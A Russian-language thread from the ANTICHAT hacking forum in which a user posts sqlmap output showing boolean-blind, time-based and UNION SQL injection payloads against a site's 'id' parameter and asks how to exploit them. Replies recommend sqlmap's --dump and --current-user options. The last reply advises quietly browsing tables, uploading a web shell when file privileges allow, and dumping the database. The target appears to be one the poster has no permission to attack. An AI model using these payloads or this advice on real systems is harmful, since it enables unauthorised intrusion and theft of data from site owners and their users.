HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.08.2018, 14:28
g00db0y
Участник форума
Регистрация: 27.08.2018
Сообщений: 137
С нами: 4059598

Репутация: 0
По умолчанию

Добрый день!
При работе с sqlmap, мне выдало следующее:

Код:


Код:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
   
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: id=-6433' UNION ALL SELECT  NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать?
 
Ответить с цитированием

  #2  
Старый 28.08.2018, 14:33
sudo
Новичок
Регистрация: 10.10.2017
Сообщений: 0
С нами: 4521582

Репутация: 0
По умолчанию

Цитата:

g00db0y сказал(а):

Добрый день!
При работе с sqlmap, мне выдало следующее:

Код:


Код:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
  
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: id=-6433' UNION ALL SELECT  NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать?

Например подставить значение поля payload в url?
 
Ответить с цитированием

  #3  
Старый 28.08.2018, 14:36
g00db0y
Участник форума
Регистрация: 27.08.2018
Сообщений: 137
С нами: 4059598

Репутация: 0
По умолчанию

Цитата:

sudo сказал(а):

Например подставить значение поля payload в url?

вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло
 
Ответить с цитированием

  #4  
Старый 28.08.2018, 15:02
sudo
Новичок
Регистрация: 10.10.2017
Сообщений: 0
С нами: 4521582

Репутация: 0
По умолчанию

Цитата:

g00db0y сказал(а):

вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло

Значит прога ошиблась и пейлоады оказались нерабочими. Логично?
 
Ответить с цитированием

  #5  
Старый 28.08.2018, 15:10
g00db0y
Участник форума
Регистрация: 27.08.2018
Сообщений: 137
С нами: 4059598

Репутация: 0
По умолчанию

Цитата:

sudo сказал(а):

Значит прога ошиблась и пейлоады оказались нерабочими. Логично?

А ведь логично, спасибо!
 
Ответить с цитированием

  #6  
Старый 07.09.2018, 22:01
jess_hide
Новичок
Регистрация: 04.09.2018
Сообщений: 0
С нами: 4047575

Репутация: 0
По умолчанию

А зачем тебе в урл добавлять, раскрути sqlmap там же есть специальная функция, почитай help
 
Ответить с цитированием

  #7  
Старый 08.09.2018, 01:42
iskus
Новичок
Регистрация: 14.10.2012
Сообщений: 1
С нами: 7146326

Репутация: 0
По умолчанию

сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет
 
Ответить с цитированием

  #8  
Старый 08.09.2018, 12:59
pr0phet
Новичок
Регистрация: 02.04.2018
Сообщений: 0
С нами: 4271840

Репутация: 0
По умолчанию

Цитата:

Iskus сказал(а):

сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет

Я обычно добавляю что-то типа --current-user. Менее палево, нежели делать вероятно ненужный дамп. Лучше руками побегать по таблицам посмотреть что есть. Если filepriv позволяет писать файлы - заливаем шелл - дампим базу не селектами. (сценарий из разряда "как в сказке ")
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...